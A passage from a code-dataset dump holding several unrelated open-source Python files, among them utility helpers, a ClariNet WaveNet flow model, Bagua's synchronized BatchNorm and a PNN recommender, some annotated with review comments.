def assert_all_instances(list_, class_, label="object"):
    """Raise ModelInconsistencyError when any object in `list_` is not an
    instance of `class_`.

    Args:
        list_: iterable of objects to check (``None`` is treated as empty).
        class_: required class.
        label: human-readable name used in the error message.
    """
    for obj in list_ or []:
        # BUGFIX: the caller-supplied `label` was previously ignored and
        # the literal "object" was always reported in the error message.
        assert_instance(obj, class_, label=label)
class MissingPackageError(Exception):
    """Raised when an optional package required for a feature is missing."""
    pass
class MissingPackage(object):
    """Placeholder for an optional package that failed to import.

    Calling the object or accessing any attribute raises
    MissingPackageError with a message describing how to obtain the
    real package.
    """

    def __init__(self, package, feature=None, source=None, comment=None):
        self.package = package
        self.feature = feature
        self.source = source
        self.comment = comment

    def __call__(self, *args, **kwargs):
        self._fail()

    def __getattr__(self, name):
        self._fail()

    def _fail(self):
        # Assemble the optional message fragments.
        use = " to be able to use: %s" % self.feature if self.feature else ""
        source = " from %s" % self.source if self.source else ""
        comment = ". %s" % self.comment if self.comment else ""

        raise MissingPackageError("Optional package '%s' is not installed. "
                                  "Please install the package%s%s%s" %
                                  (self.package, source, use, comment))
def optional_import(name, feature=None, source=None, comment=None):
    """Import package `name`, falling back to a MissingPackage placeholder
    that raises a descriptive error on first use."""
    try:
        module = __import__(name)
    except ImportError:
        module = MissingPackage(name, feature, source, comment)
    return module
def expand_dictionary(record, separator='.'):
    """Expand flat keys such as ``"a.b.c"`` into nested dictionaries,
    splitting on `separator` and creating sub-dictionaries as needed."""
    expanded = {}
    for key, value in record.items():
        path = key.split(separator)
        node = expanded
        for name in path[:-1]:
            node = node.setdefault(name, {})
        node[path[-1]] = value
    return expanded
def localize_common(obj, trans):
    """Copy the localizable ``label``/``description`` entries of `trans`
    onto `obj`; keys missing from `trans` leave `obj` untouched."""
    for attr in ("label", "description"):
        if attr in trans:
            setattr(obj, attr, trans[attr])
def localize_attributes(attribs, translations):
    """Localize a mapping of attributes.

    `translations` maps attribute names to dictionaries of localizable
    metadata (such as ``label`` or ``description``) which are applied to
    the corresponding entry of `attribs`.
    """
    for name, trans in translations.items():
        localize_common(attribs[name], trans)
def get_localizable_attributes(obj):
    """Return a dictionary with the localizable attributes of `obj`.

    Only truthy ``label`` and ``description`` values are included;
    objects lacking either attribute are handled gracefully.
    """
    # FIXME: use some kind of class attribute to get list of localizable attributes
    locale = {}
    for attr in ("label", "description"):
        # IMPROVEMENT: getattr with a default replaces the former bare
        # ``except:`` blocks, which also swallowed unrelated errors.
        value = getattr(obj, attr, None)
        if value:
            locale[attr] = value
    return locale
def decamelize(name):
    """Insert spaces at the CamelCase word boundaries of `name`."""
    # First split an upper-case letter followed by lower-case letters,
    # then split a lower-case/digit followed by an upper-case letter.
    spaced = re.sub('(.)([A-Z][a-z]+)', r'\1 \2', name)
    return re.sub('([a-z0-9])([A-Z])', r'\1 \2', spaced)
def to_identifier(name):
    """Lower-case `name` and replace every space with an underscore."""
    return name.replace(" ", "_").lower()
def to_label(name, capitalize=True):
    """Convert identifier `name` into a label: underscores become spaces
    and, when `capitalize` is set (default), the first letter is
    upper-cased (the rest is lowered, as per ``str.capitalize``)."""
    text = name.replace("_", " ")
    return text.capitalize() if capitalize else text
def coalesce_option_value(value, value_type, label=None):
    """Convert string into an object value of `value_type`. The type might be:
    `string` (no conversion), `integer`, `float`, `list` – comma separated
    list of strings.

    Raises ArgumentError (with `label` in the message, when given) if the
    value can not be converted.
    """
    value_type = value_type.lower()

    try:
        if value_type in ('string', 'str'):
            return_value = str(value)
        elif value_type == 'list':
            if isinstance(value, compat.string_type):
                return_value = value.split(",")
            else:
                return_value = list(value)
        elif value_type == "float":
            return_value = float(value)
        elif value_type in ["integer", "int"]:
            return_value = int(value)
        elif value_type in ["bool", "boolean"]:
            if not value:
                return_value = False
            elif isinstance(value, compat.string_type):
                return_value = value.lower() in ["1", "true", "yes", "on"]
            else:
                return_value = bool(value)
        else:
            raise ArgumentError("Unknown option value type %s" % value_type)

    except ValueError:
        if label:
            label = "parameter %s " % label
        else:
            label = ""

        # BUGFIX: the message previously interpolated an undefined name
        # (`astring`), so conversion failures raised NameError instead of
        # the intended ArgumentError.
        raise ArgumentError("Unable to convert %svalue '%s' into type %s" %
                            (label, value, value_type))

    return return_value
def coalesce_options(options, types):
    """Coerce every entry of `options` whose key appears in `types` to the
    declared type (string, list, float, integer or bool); entries without
    a declared type are passed through unchanged."""
    return {
        key: (coalesce_option_value(value, types[key], key)
              if key in types else value)
        for key, value in options.items()
    }
def read_json_file(path, kind=None):
    """Load and parse the JSON file at `path`.

    Wraps the usual failure modes (missing file, unreadable file, invalid
    JSON) in more descriptive exceptions.  `kind` is an optional noun used
    in the error messages.
    """
    kind = "%s " % str(kind) if kind else ""

    if not os.path.exists(path):
        raise ConfigurationError("Can not find %sfile '%s'"
                                 % (kind, path))

    try:
        handle = compat.open_unicode(path)
    except IOError:
        raise ConfigurationError("Can not open %sfile '%s'"
                                 % (kind, path))

    try:
        return json.load(handle)
    except ValueError as exc:
        raise SyntaxError("Syntax error in %sfile %s: %s"
                          % (kind, path, str(exc)))
    finally:
        # Close the handle on both the success and failure paths.
        handle.close()
def sorted_dependencies(graph):
    """Topologically sort `graph` using Kahn's algorithm.

    `graph` is a dictionary mapping each node (string) to the list of
    nodes it depends on.  Returns the nodes ordered so that every node
    appears after its dependencies.

    Example::

        A ---> B -+--> C
                  |
                  +--> D --> E

    Will be: ``{"A": ["B"], "B": ["C", "D"], "D": ["E"],"E": []}``

    Raises ArgumentError when the graph contains a cycle.
    """
    # Work on a mutable copy: node -> set of unresolved dependencies.
    remaining = dict((node, set(deps)) for node, deps in graph.items())

    order = []
    # Seed with the nodes that depend on nothing.
    ready = set(node for node, deps in remaining.items() if not deps)

    while ready:
        node = ready.pop()
        order.append(node)
        # Unblock every node that was waiting on `node`.
        for dependant, deps in remaining.items():
            if node in deps:
                deps.remove(node)
                if not deps:
                    ready.add(dependant)

    # Any node with unresolved dependencies left is part of a cycle.
    unresolved = [node for node, deps in remaining.items() if deps]
    if unresolved:
        raise ArgumentError("Cyclic dependency of: %s"
                            % ", ".join(unresolved))
    return order
|
wavenet_iaf.py | Ella77/ClariNet | 126 | 10617 | import torch
import torch.nn as nn
import torch.nn.functional as F
from modules import Conv, ResBlock
class Wavenet_Student(nn.Module):
    """ClariNet student network: a chain of inverse autoregressive flow
    (IAF) WaveNets that maps a noise sequence ``z`` into audio,
    conditioned on (upsampled) features ``c``.
    """

    # NOTE(review): mutable default argument (list); harmless here since it
    # is only read, but a tuple would be safer.
    def __init__(self, num_blocks_student=[1, 1, 1, 1, 1, 1], num_layers=10,
                 front_channels=32, residual_channels=64, gate_channels=128, skip_channels=64,
                 kernel_size=3, cin_channels=80, causal=True):
        super(Wavenet_Student, self).__init__()
        self.num_blocks = num_blocks_student
        self.num_flow = len(self.num_blocks)
        self.num_layers = num_layers
        # One IAF flow per entry of num_blocks_student; each flow outputs a
        # (mu, log-scale) pair, hence out_channels=2.
        self.iafs = nn.ModuleList()
        for i in range(self.num_flow):
            self.iafs.append(Wavenet_Flow(out_channels=2,
                                          num_blocks=self.num_blocks[i], num_layers=self.num_layers,
                                          front_channels=front_channels, residual_channels=residual_channels,
                                          gate_channels=gate_channels, skip_channels=skip_channels,
                                          kernel_size=kernel_size, cin_channels=cin_channels, causal=causal))

    def forward(self, z, c):
        """Transform noise ``z`` into audio given conditioning ``c``."""
        return self.iaf(z, c)

    def iaf(self, z, c_up):
        """Apply all flows sequentially.

        Returns the transformed signal together with the accumulated mean
        and log-scale of the composed affine transforms.
        """
        mu_tot, logs_tot = 0., 0.
        for i, iaf in enumerate(self.iafs):
            mu_logs = iaf(z, c_up)
            # Channel 0 is the mean, channel 1 the log-scale; the last time
            # step is dropped and, below, the output is shifted right by one
            # sample (left zero-pad) to keep the transform causal.
            mu = mu_logs[:, 0:1, :-1]
            logs = mu_logs[:, 1:, :-1]
            mu_tot = mu_tot * torch.exp(logs) + mu
            logs_tot = logs_tot + logs
            z = z[:, :, 1:] * torch.exp(logs) + mu
            z = F.pad(z, pad=(1, 0), mode='constant', value=0)
        return z, mu_tot, logs_tot

    def receptive_field(self):
        """Total receptive field of the chained flows, in samples."""
        receptive_field = 1
        for iaf in self.iafs:
            receptive_field += iaf.receptive_field_size() - 1
        return receptive_field

    def generate(self, z, c_up):
        """Synthesize audio from noise ``z`` (flow statistics discarded)."""
        x, _, _ = self.iaf(z, c_up)
        return x

    def remove_weight_norm(self):
        # Strip weight normalization from every flow (for inference).
        for iaf in self.iafs:
            iaf.remove_weight_norm()
class Wavenet_Flow(nn.Module):
    """One WaveNet used as a single IAF flow stage.

    Maps a 1-channel input (with local conditioning ``c``) to
    ``out_channels`` outputs through ``num_blocks`` stacks of
    ``num_layers`` dilated residual blocks.
    """

    def __init__(self, out_channels=1, num_blocks=1, num_layers=10,
                 front_channels=32, residual_channels=64, gate_channels=32, skip_channels=None,
                 kernel_size=3, cin_channels=80, causal=True):
        super(Wavenet_Flow, self). __init__()

        self.causal = causal
        self.num_blocks = num_blocks
        self.num_layers = num_layers
        self.front_channels = front_channels
        self.out_channels = out_channels
        self.gate_channels = gate_channels
        self.residual_channels = residual_channels
        self.skip_channels = skip_channels
        self.cin_channels = cin_channels
        self.kernel_size = kernel_size

        # Front convolution lifts the raw 1-channel signal to the
        # residual-channel width.
        self.front_conv = nn.Sequential(
            Conv(1, self.residual_channels, self.front_channels, causal=self.causal),
            nn.ReLU()
        )
        # Dilated residual blocks; dilation doubles each layer (2**n).
        # NOTE(review): res_blocks_fast is never populated here --
        # presumably reserved for an incremental-generation variant.
        self.res_blocks = nn.ModuleList()
        self.res_blocks_fast = nn.ModuleList()
        for b in range(self.num_blocks):
            for n in range(self.num_layers):
                self.res_blocks.append(ResBlock(self.residual_channels, self.gate_channels, self.skip_channels,
                                                self.kernel_size, dilation=2**n,
                                                cin_channels=self.cin_channels, local_conditioning=True,
                                                causal=self.causal, mode='SAME'))
        # Post-network on the summed skip connections.
        self.final_conv = nn.Sequential(
            nn.ReLU(),
            Conv(self.skip_channels, self.skip_channels, 1, causal=self.causal),
            nn.ReLU(),
            Conv(self.skip_channels, self.out_channels, 1, causal=self.causal)
        )

    def forward(self, x, c):
        """Run the WaveNet on input ``x`` with conditioning ``c``."""
        return self.wavenet(x, c)

    def wavenet(self, tensor, c=None):
        # Sum the skip outputs of every residual block, then post-process.
        h = self.front_conv(tensor)
        skip = 0
        for i, f in enumerate(self.res_blocks):
            h, s = f(h, c)
            skip += s
        out = self.final_conv(skip)
        return out

    def receptive_field_size(self):
        """Receptive field in samples (doubled for non-causal convs)."""
        num_dir = 1 if self.causal else 2
        dilations = [2 ** (i % self.num_layers) for i in range(self.num_layers * self.num_blocks)]
        return num_dir * (self.kernel_size - 1) * sum(dilations) + 1 + (self.front_channels - 1)

    def remove_weight_norm(self):
        for f in self.res_blocks:
            f.remove_weight_norm()
|
sql/src/test/resources/joins/create_sample_table.py | MichelaSalvemini/Modelli_project | 677 | 10620 | #! /usr/bin/env python
from __future__ import print_function
import pandas as pd
import numpy as np
import argparse
def generate_csv(start_index, fname, num_rows=None, num_cols=None,
                 num_distinct_vals=None):
    """Write a CSV of uniform random integers in ``[0, num_distinct_vals)``.

    Column names are ``A<start_index> .. A<start_index + num_cols - 1>``,
    so two tables generated with overlapping index ranges share join
    columns.

    The sizing arguments default to the module-level NUM_ROWS / NUM_COLS /
    NUM_DISTINCT_VALS globals set by the CLI, for backward compatibility.
    """
    if num_rows is None:
        num_rows = NUM_ROWS
    if num_cols is None:
        num_cols = NUM_COLS
    if num_distinct_vals is None:
        num_distinct_vals = NUM_DISTINCT_VALS

    cols = ['A' + str(i) for i in range(start_index, num_cols + start_index)]
    # BUGFIX: rows were previously appended as *generator expressions*,
    # which pandas does not expand into cell values.  Draw the whole
    # integer matrix at once instead (same uniform distribution).
    data = np.random.choice(num_distinct_vals, size=(num_rows, num_cols))
    df = pd.DataFrame(data=data, columns=cols)
    df.to_csv(fname, index=False, header=True)
if __name__ == '__main__':
    # CLI entry point: generate two CSV tables whose column-name ranges
    # overlap by --num-cols-overlap, for exercising join queries.
    parser = argparse.ArgumentParser(
        description='Generate sample tables to test joins.')
    parser.add_argument('--num-rows', '-r', type=int, default=100)
    parser.add_argument('--num-cols', '-c', type=int, required=True)
    parser.add_argument('--num-distinct-vals', '-d', type=int, required=True)
    parser.add_argument('--num-cols-overlap', '-o', type=int, default=1)
    args = parser.parse_args()
    # Globals consumed by generate_csv().
    NUM_ROWS = args.num_rows
    NUM_COLS = args.num_cols
    NUM_DISTINCT_VALS = args.num_distinct_vals
    num_overlap = args.num_cols_overlap
    if num_overlap > NUM_COLS:
        print('--num-cols-overlap cannot be greater than --num-cols')
        import sys
        sys.exit(1)
    # table_b starts NUM_COLS - num_overlap columns in, so exactly
    # num_overlap column names are shared between the two tables.
    generate_csv(0, 'table_a.csv')
    generate_csv(NUM_COLS - num_overlap, 'table_b.csv')
|
cookietemple/create/templates/cli/cli_python/{{ cookiecutter.project_slug_no_hyphen }}/tests/__init__.py | e2jk/cookietemple | 117 | 10628 | <gh_stars>100-1000
"""Test suite for the {{ cookiecutter.project_slug_no_hyphen }} package."""
|
bricks/ev3dev/modules/pybricks/robotics.py | ZPhilo/pybricks-micropython | 115 | 10629 | # SPDX-License-Identifier: MIT
# Copyright (c) 2018-2020 The Pybricks Authors
"""Pybricks robotics module."""
from _pybricks.robotics import DriveBase
|
rl_repr/batch_rl/evaluation.py | xxdreck/google-research | 23,901 | 10641 | <reponame>xxdreck/google-research<filename>rl_repr/batch_rl/evaluation.py
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Policy evaluation."""
import typing
import tensorflow.compat.v2 as tf
def evaluate(
    env,
    policy,
    num_episodes = 10,
    ctx_length = None,
    embed_training_window = None,
    state_mask_fn = None,  # pylint: disable=g-bare-generic
):
  """Evaluates the policy.

  Args:
    env: Environment to evaluate the policy on.
    policy: Policy to evaluate.
    num_episodes: A number of episodes to average the policy on.
    ctx_length: number of previous steps to compute context from.
    embed_training_window: window size used during embed training.
    state_mask_fn: state masking function for partially obs envs.

  Returns:
    Averaged reward and a total number of steps.
  """
  total_timesteps = 0
  total_returns = 0.0

  def apply_mask(observation):
    # Optionally hide parts of the observation (partially observable envs).
    if state_mask_fn:
      return tf.convert_to_tensor(state_mask_fn(observation.numpy()))
    return observation

  for _ in range(num_episodes):
    timestep = env.reset()
    if ctx_length:
      # Prime the context window with copies of the initial observation,
      # zero actions and zero rewards.
      states = [apply_mask(timestep.observation) for _ in range(ctx_length)]
      actions = [
          tf.zeros(policy.action_spec.shape)[None, :] for _ in range(ctx_length)
      ]
      rewards = [[0.] for _ in range(ctx_length)]

    latent_action = None
    i = 0
    while not timestep.is_last():
      # Re-sample the latent action at every embed-training-window boundary.
      if embed_training_window and (i % embed_training_window == 0 or
                                    embed_training_window <= 2):
        latent_action = None
      if ctx_length:
        # Maintain a rolling window of the last ctx_length transitions.
        states.append(apply_mask(timestep.observation))
        if len(states) > ctx_length:
          states.pop(0)
          actions.pop(0)
          rewards.pop(0)
        action = policy.act(
            tf.stack(states, axis=1),
            actions=tf.stack(actions, axis=1),
            rewards=tf.stack(rewards, axis=1))
        actions.append(action)
      else:
        if embed_training_window:
          action, latent_action = policy.act(
              apply_mask(timestep.observation), latent_action=latent_action)
        else:
          action = policy.act(apply_mask(timestep.observation))

      timestep = env.step(action)

      if ctx_length:
        rewards.append(timestep.reward)

      total_returns += timestep.reward[0]
      total_timesteps += 1
      i += 1

  return total_returns / num_episodes, total_timesteps / num_episodes
|
bagua/torch_api/contrib/sync_batchnorm.py | mmathys/bagua | 635 | 10646 | <gh_stars>100-1000
# Copyright (c) Uber Technologies, Inc. and its affiliates.
# Copyright (c) 2021 Kuaishou AI Platform & DS3 Lab.
#
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from distutils.version import LooseVersion
import torch
from torch.autograd.function import Function
import torch.nn.functional as F
from torch.nn.modules.batchnorm import _BatchNorm
import bagua.torch_api as bagua
from bagua.torch_api.communication import allgather, allreduce
# Backward compat for old PyTorch
if not hasattr(torch.jit, "unused"):
    torch.jit.unused = lambda x: x

# Feature flags keyed on the PyTorch version: the sync-BN internals changed
# at 1.5 (counts-based gather API), 1.6 (float counts expected) and 1.9
# (batch_norm_backward_elemt expects a count tensor).
_SYNC_BN_V2 = LooseVersion(torch.__version__) >= LooseVersion("1.5.0") and LooseVersion(
    torch.__version__
) <= LooseVersion("1.6.0")
_SYNC_BN_V3 = LooseVersion(torch.__version__) >= LooseVersion("1.6.0")
_SYNC_BN_V4 = LooseVersion(torch.__version__) >= LooseVersion("1.9.0")
class SyncBatchNorm(_BatchNorm):
    r"""Applies synchronous BatchNorm for distributed module with N-dimensional BatchNorm layer(s).
    See `BatchNorm <https://pytorch.org/docs/stable/generated/torch.nn.BatchNorm2d.html?highlight=batchnorm#torch.nn.BatchNorm2d>`_ for more details.

    Arguments:
        num_features: Number of channels :math:`C` from the shape :math:`(N, C, ...)`.
        eps: A value added to the denominator for numerical stability. Default: 1e-5.
        momentum: The value used for the running_mean and running_var
            computation. Can be set to ``None`` for cumulative moving average
            (i.e. simple average). Default: 0.1.
        affine: A boolean value that when set to ``True``, this module has
            learnable affine parameters. Default: ``True``.
        track_running_stats: A boolean value that when set to ``True``, this
            module tracks the running mean and variance, and when set to ``False``,
            this module does not track such statistics and always uses batch
            statistics in both training and eval modes. Default: ``True``.

    .. note:: Only GPU input tensors are supported in the training mode.
    """

    def __init__(
        self,
        num_features,
        eps=1e-5,
        momentum=0.1,
        affine=True,
        track_running_stats=True,
    ):
        super().__init__(num_features, eps, momentum, affine, track_running_stats)

    def _check_input_dim(self, input):
        # BatchNorm expects at least (N, C); anything smaller is malformed.
        if input.dim() < 2:
            raise ValueError(
                "expected at least 2D input (got {}D input)".format(input.dim())
            )

    def _run_bn(self, input):
        # Plain (non-synchronized) batch norm using this module's buffers.
        return F.batch_norm(
            input,
            self.running_mean,
            self.running_var,
            self.weight,
            self.bias,
            self.training or not self.track_running_stats,
            self.momentum,
            self.eps,
        )

    @torch.jit.unused
    def _maybe_run_sync_bn(self, input):
        # With a single process there is nothing to synchronize; fall back
        # to the local kernel.
        if bagua.get_world_size() == 1:
            return self._run_bn(input)
        return _SyncBatchNorm.apply(
            input,
            self.weight,
            self.bias,
            self.running_mean,
            self.running_var,
            self.eps,
            self.momentum,
        )

    def forward(self, input):
        # currently only GPU input is supported by underlying kernel from PyTorch
        if not input.is_cuda:
            raise ValueError("SyncBatchNorm expected input tensor to be on GPU")

        self._check_input_dim(input)

        if self.training and self.track_running_stats:
            assert self.num_batches_tracked is not None
            # NOTE(review): this rebinds the buffer to a new tensor rather
            # than updating it in place; works, but differs from upstream.
            self.num_batches_tracked = self.num_batches_tracked + 1

        # In eval mode with tracked stats use the running statistics;
        # otherwise compute (and possibly synchronize) batch statistics.
        if not self.training and self.track_running_stats:
            return self._run_bn(input)
        else:
            return self._maybe_run_sync_bn(input)

    @classmethod
    def convert_sync_batchnorm(cls, module):
        r"""Helper function to convert all :attr:`BatchNorm*D` layers in the model to
        `torch.nn.SyncBatchNorm <https://pytorch.org/docs/stable/generated/torch.nn.SyncBatchNorm.html?highlight=syncbatchnorm#torch.nn.SyncBatchNorm>`_ layers.

        Arguments:
            module (nn.Module): Module containing one or more :attr:`BatchNorm*D` layers

        Returns:
            The original :attr:`module` with the converted :class:`torch.nn.SyncBatchNorm`
            layers. If the original :attr:`module` is a :attr:`BatchNorm*D` layer,
            a new :class:`torch.nn.SyncBatchNorm` layer object will be returned
            instead.

        .. note:: This function must be called before :meth:`~bagua.torch_api.distributed.BaguaModule.with_bagua` method.

        Example::

            >>> # Network with nn.BatchNorm layer
            >>> model = torch.nn.Sequential(
            ...            torch.nn.Linear(D_in, H),
            ...            torch.nn.ReLU(),
            ...            torch.nn.Linear(H, D_out),
            ...          )
            >>> optimizer = torch.optim.SGD(
            ...            model.parameters(),
            ...            lr=0.01,
            ...            momentum=0.9
            ...          )
            >>> sync_bn_model = bagua.torch_api.contrib.sync_batchnorm.SyncBatchNorm.convert_sync_batchnorm(model)
            >>> bagua_model = sync_bn_model.with_bagua([optimizer], GradientAllReduce())
        """
        module_output = module

        # Replace this node if it is any BatchNorm variant, copying the
        # affine parameters and running statistics over.
        if isinstance(module, torch.nn.modules.batchnorm._BatchNorm):
            module_output = SyncBatchNorm(
                module.num_features,
                module.eps,
                module.momentum,
                module.affine,
                module.track_running_stats,
            )
            if module.affine:
                with torch.no_grad():
                    module_output.weight = module.weight
                    module_output.bias = module.bias
            module_output.running_mean = module.running_mean
            module_output.running_var = module.running_var
            module_output.num_batches_tracked = module.num_batches_tracked
            if hasattr(module, "qconfig"):
                module_output.qconfig = module.qconfig
        # Recurse into children so nested BatchNorm layers are converted too.
        for name, child in module.named_children():
            module_output.add_module(name, cls.convert_sync_batchnorm(child))
        del module
        return module_output
class _SyncBatchNorm(Function):
    """Autograd function implementing cross-worker synchronized batch norm.

    Forward all-gathers per-worker (count, mean, invstd) and normalizes
    with the global statistics; backward all-reduces the gradient sums.
    """

    @staticmethod
    def forward(self, input, weight, bias, running_mean, running_var, eps, momentum):
        input = input.contiguous()

        # Elements per channel on this worker.
        size = input.numel() // input.size(1)
        count = torch.tensor([size])

        # calculate mean/invstd for input.
        mean, invstd = torch.batch_norm_stats(input, eps)

        count, mean, invstd = count.cuda(), mean.cuda(), invstd.cuda()

        # Gather every worker's local statistics.
        # NOTE(review): building the gather buffers via numpy round-trips
        # is unusual; torch.empty with the right shape would be simpler.
        nums_ranks = bagua.get_world_size()
        count_all = torch.tensor(
            [torch.empty_like(count).cpu().detach().numpy() for _ in range(nums_ranks)]
        ).cuda()
        mean_all = torch.tensor(
            [torch.empty_like(mean).cpu().detach().numpy() for _ in range(nums_ranks)]
        ).cuda()
        invstd_all = torch.tensor(
            [torch.empty_like(invstd).cpu().detach().numpy() for _ in range(nums_ranks)]
        ).cuda()

        allgather(count.unsqueeze(0), count_all)
        allgather(mean.unsqueeze(0), mean_all)
        allgather(invstd.unsqueeze(0), invstd_all)

        if _SYNC_BN_V3:
            counts_for_bngswc = count_all.view(-1).float().to(input.device)
        else:
            # backwards compatibility
            counts_for_bngswc = count_all.view(-1).tolist()

        # calculate global mean & invstd
        mean, invstd = torch.batch_norm_gather_stats_with_counts(
            input,
            mean_all,
            invstd_all,
            running_mean,
            running_var,
            momentum,
            eps,
            counts_for_bngswc,
        )

        self.save_for_backward(input, weight, mean, invstd, count_all)

        # apply element-wise normalization
        return torch.batch_norm_elemt(input, weight, bias, mean, invstd, eps)

    @staticmethod
    def backward(self, grad_output):
        grad_output = grad_output.contiguous()
        saved_input, weight, mean, invstd, count_all = self.saved_tensors
        need_input_grad, need_weight_grad, need_bias_grad = self.needs_input_grad[0:3]

        # calculate local stats as well as grad_weight / grad_bias
        sum_dy, sum_dy_xmu, grad_weight, grad_bias = torch.batch_norm_backward_reduce(
            grad_output,
            saved_input,
            mean,
            invstd,
            weight,
            need_input_grad,
            need_weight_grad,
            need_bias_grad,
        )

        if need_input_grad:
            # synchronizing stats used to calculate input gradient.
            allreduce(sum_dy, sum_dy)
            allreduce(sum_dy_xmu, sum_dy_xmu)

            if _SYNC_BN_V4:
                # from 1.9.0 on we need a count tensor on all devices
                # count_all is calculated as total count across all ranks in forward function
                count_all = count_all.to(dtype=torch.int, device=grad_output.device)
            elif _SYNC_BN_V2 or _SYNC_BN_V3:
                # before 1.9.0 we need the count as an integer to compute means values
                count = count_all.sum()
            else:
                # before 1.5.0, sum_dy was sum of means from every worker, so we just
                # need to divide it by number of workers
                count = bagua.get_world_size()

            # backward pass for gradient calculation
            # we are calling into a non-public undocumented function which broke moving to 1.9.0
            # https://github.com/pytorch/pytorch/issues/57900
            if _SYNC_BN_V4:
                # from 1.9.0 on, sums and count parameters expected
                grad_input = torch.batch_norm_backward_elemt(
                    grad_output,
                    saved_input,
                    mean,
                    invstd,
                    weight,
                    sum_dy,
                    sum_dy_xmu,
                    count_all,
                )
            else:
                # before 1.9.0, mean parameters expected, not sums and count
                grad_input = torch.batch_norm_backward_elemt(
                    grad_output,
                    saved_input,
                    mean,
                    invstd,
                    weight,
                    sum_dy / count,
                    sum_dy_xmu / count,
                )
        else:
            grad_input = None

        # synchronizing of grad_weight / grad_bias is not needed as distributed
        # training would handle all reduce.
        if weight is None or not need_weight_grad:
            grad_weight = None

        if weight is None or not need_bias_grad:
            grad_bias = None

        return grad_input, grad_weight, grad_bias, None, None, None, None, None, None
|
PNN/model.py | jingxiufenghua/rec-model | 1,323 | 10654 | <reponame>jingxiufenghua/rec-model
"""
Created on July 20, 2020
Updated on May 19, 2021
model: Product-based Neural Networks for User Response Prediction
@author: <NAME>(<EMAIL>)
"""
import tensorflow as tf
from tensorflow.keras import Model
from tensorflow.keras.regularizers import l2
from tensorflow.keras.layers import Embedding, Dense, Layer, Dropout, Input
from modules import DNN
class PNN(Model):
    def __init__(self, feature_columns, hidden_units, mode='in', dnn_dropout=0.,
                 activation='relu', embed_reg=1e-6, w_z_reg=1e-6, w_p_reg=1e-6, l_b_reg=1e-6):
        """
        Product-based Neural Networks
        :param feature_columns: A list. sparse column feature information.
        :param hidden_units: A list. Neural network hidden units.
        :param mode: A string. 'in' IPNN or 'out'OPNN.
        :param activation: A string. Activation function of dnn.
        :param dnn_dropout: A scalar. Dropout of dnn.
        :param embed_reg: A scalar. The regularizer of embedding.
        :param w_z_reg: A scalar. The regularizer of w_z_ in product layer
        :param w_p_reg: A scalar. The regularizer of w_p in product layer
        :param l_b_reg: A scalar. The regularizer of l_b in product layer
        """
        super(PNN, self).__init__()
        # inner product or outer product
        self.mode = mode
        self.sparse_feature_columns = feature_columns
        # the number of feature fields
        self.field_num = len(self.sparse_feature_columns)
        self.embed_dim = self.sparse_feature_columns[0]['embed_dim']
        # The embedding dimension of each feature field must be the same
        self.embed_layers = {
            'embed_' + str(i): Embedding(input_dim=feat['feat_num'],
                                         input_length=1,
                                         output_dim=feat['embed_dim'],
                                         embeddings_initializer='random_uniform',
                                         embeddings_regularizer=l2(embed_reg))
            for i, feat in enumerate(self.sparse_feature_columns)
        }
        # parameters
        # w_z maps the (linear) signal part of the embeddings to the first
        # hidden layer.
        self.w_z = self.add_weight(name='w_z',
                                   shape=(self.field_num, self.embed_dim, hidden_units[0]),
                                   initializer='random_uniform',
                                   regularizer=l2(w_z_reg),
                                   trainable=True
                                   )
        # w_p maps the pairwise product signals; its shape depends on
        # whether inner ('in') or outer ('out') products are used.
        if mode == 'in':
            self.w_p = self.add_weight(name='w_p',
                                       shape=(self.field_num * (self.field_num - 1) // 2, self.embed_dim,
                                              hidden_units[0]),
                                       initializer='random_uniform',
                                       # BUGFIX: this keyword was misspelled
                                       # `reguarizer`, so the L2 penalty was
                                       # never applied (or raised a TypeError,
                                       # depending on the Keras version).
                                       regularizer=l2(w_p_reg),
                                       trainable=True)
        # out
        else:
            self.w_p = self.add_weight(name='w_p',
                                       shape=(self.field_num * (self.field_num - 1) // 2, self.embed_dim,
                                              self.embed_dim, hidden_units[0]),
                                       initializer='random_uniform',
                                       regularizer=l2(w_p_reg),
                                       trainable=True)
        self.l_b = self.add_weight(name='l_b', shape=(hidden_units[0], ),
                                   initializer='random_uniform',
                                   regularizer=l2(l_b_reg),
                                   trainable=True)
        # dnn
        self.dnn_network = DNN(hidden_units[1:], activation, dnn_dropout)
        self.dense_final = Dense(1)

    def call(self, inputs):
        sparse_inputs = inputs
        sparse_embed = [self.embed_layers['embed_{}'.format(i)](sparse_inputs[:, i])
                        for i in range(sparse_inputs.shape[1])]
        sparse_embed = tf.transpose(tf.convert_to_tensor(sparse_embed), [1, 0, 2])  # (None, field_num, embed_dim)
        # product layer: enumerate every unordered field pair (i, j).
        row = []
        col = []
        for i in range(len(self.sparse_feature_columns) - 1):
            for j in range(i + 1, len(self.sparse_feature_columns)):
                row.append(i)
                col.append(j)
        p = tf.gather(sparse_embed, row, axis=1)
        q = tf.gather(sparse_embed, col, axis=1)
        if self.mode == 'in':
            l_p = tf.tensordot(p*q, self.w_p, axes=2)  # (None, hidden[0])
        else:  # out
            u = tf.expand_dims(q, 2)  # (None, field_num(field_num-1)/2, 1, emb_dim)
            v = tf.expand_dims(p, 2)  # (None, field_num(field_num-1)/2, 1, emb_dim)
            l_p = tf.tensordot(tf.matmul(tf.transpose(u, [0, 1, 3, 2]), v), self.w_p, axes=3)  # (None, hidden[0])

        l_z = tf.tensordot(sparse_embed, self.w_z, axes=2)  # (None, hidden[0])
        # NOTE(review): tf.concat of a single tensor is a no-op; kept for
        # parity with the original computation.
        l_1 = tf.nn.relu(tf.concat([l_z + l_p + self.l_b], axis=-1))
        # dnn layer
        dnn_x = self.dnn_network(l_1)
        outputs = tf.nn.sigmoid(self.dense_final(dnn_x))
        return outputs

    def summary(self):
        sparse_inputs = Input(shape=(len(self.sparse_feature_columns),), dtype=tf.int32)
        Model(inputs=sparse_inputs, outputs=self.call(sparse_inputs)).summary()
|
vehicle/views.py | BernardAli/vehicle-service-mgt | 105 | 10682 | <filename>vehicle/views.py
from django.shortcuts import render,redirect,reverse
from . import forms,models
from django.db.models import Sum
from django.contrib.auth.models import Group
from django.http import HttpResponseRedirect
